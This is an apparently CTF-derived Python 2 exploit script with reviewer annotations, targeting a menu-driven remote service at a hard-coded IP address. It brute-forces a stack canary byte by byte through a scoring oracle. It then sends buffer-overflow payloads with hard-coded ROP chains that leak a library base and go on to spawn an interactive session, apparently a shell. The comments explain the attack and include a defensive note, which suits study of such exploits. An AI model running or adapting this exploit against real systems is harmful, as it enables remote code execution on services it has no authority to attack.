# Python 2 CTF exploit script (print statements, xrange, raw_input,
# string.lowercase, integer division) driving a menu-style remote service
# through codez.Remote. What the code visibly does: recover an 8-byte stack
# cookie one byte at a time by submitting candidate prefixes and keeping,
# per position, the candidate that produced the lowest numeric reply; then
# send two payloads built from hard-coded 64-bit addresses, the first to
# obtain a value from the reply and the second relative to that value.
# pack/unpack are not imported in this file; presumably they come from
# `from codez import *` (or struct) — unconfirmed.
# NOTE(review): the whole file was collapsed onto one line; the layout
# below is reconstructed from the statement syntax, and the indentation of
# `print 'canary'` (inside or after the outer loop) is a guess.
# Defender's note: the byte-at-a-time recovery depends on the service
# answering every attempt with a score that varies with how much of the
# input matched; a cookie that is fresh for each attempt and replies that
# do not depend on the partial match remove that oracle.
from codez import *

# The first Remote() is dead code: it is overwritten immediately by the
# second one (a local test target left in).
r = Remote('127.0.0.1',1234)
r = Remote('54.178.148.88',8888)
r.read('S')
r.read(':')

def equal(iterator):
    # True when every element is the same (or the iterable is empty).
    # Defined but never called anywhere in this file.
    return len(set(iterator)) <= 1

def randoms(s):
    # Return s random lowercase ASCII letters; used only as filler below.
    # Local `r` shadows the module-level connection inside this function.
    import random,string
    r = [ random.choice(string.lowercase) for _ in range(s)]
    return ''.join(r)

raw_input('x')
# Cookie under recovery; byte 0 is left as \0 since the loop starts at k=1.
canary = [chr(0) for i in xrange(8)]
for k in range(1,8):
    # One slot per candidate byte value; 1000 is a sentinel that any
    # observed reply is presumably smaller than (unconfirmed).
    possible = [1000 for x in xrange(256)]
    for i in range(0x1,0x100):
        canary[k] = chr(i)
        # 0x0a would break the newline-framed input; why 0x9c is skipped
        # is not evident from this file.
        if i == 0xa or i == 0x9c: continue
        # 3 NUL bytes + the candidate prefix, repeated to fill 500 bytes,
        # topped up with random letters, then newline-terminated.
        payload = "\0\0\0"
        payload += "".join(canary[:k+1])
        payload = payload * (500/len(payload))
        payload += randoms(500 - len(payload)) + "\n"
        # Menu option '2', then a length that grows with k (meaning of the
        # 505 base is not visible here), then the payload itself.
        r.sendline('2')
        r.read(':')
        r.sendline(str(505+k+1))
        r.read(':')
        r.write(payload)
        # First whitespace-separated token of the reply, parsed as an int,
        # is the score recorded for this candidate.
        x=r.read(':').strip()
        s=int(x.split(' ')[0])
        possible[i] = s
    # Lowest score wins; its index is the recovered byte for position k.
    value = min(possible)
    canary[k] = (chr(possible.index(value)))
print 'canary'
cookie = ''.join(canary)
print hex(unpack('Q',cookie)[0])
raw_input('wait')
# First payload: 504 filler bytes, the recovered cookie, 8 more filler
# bytes, then four hard-coded 64-bit values.
r.sendline('1')
rop = pack('QQQQ',0x400fb3,0x602018,0x400870,0x400980)
r.read(':')
r.sendline(str(512 + 8 + len(rop)))
r.read(':')
r.write('X'*504 +cookie +'B'*8 + rop)
# Take 6 bytes of the reply, zero-extend to 8, and subtract a fixed
# offset to get the base `x` used by the second payload.
x=unpack('Q',r.read('S')[1:7]+"\x00\x00")[0]-0x6FE30 #0x6beb0
print hex(x)
raw_input('dbg')
# Second payload: same layout, three values, two of them relative to x.
rop = pack('QQQ',0x400fb3,0x17CCDB+x,x+0x46640)
r.read(':')
r.sendline('1')
r.read(':')
r.sendline('1')
r.sendline(str(512 + 8 + len(rop)))
r.read(':')
r.write('X'*504 +cookie +'B'*8 + rop)
r.interactive()
raw_input('wait')
# Stray expression statement left at the end of the file; it has no effect.
1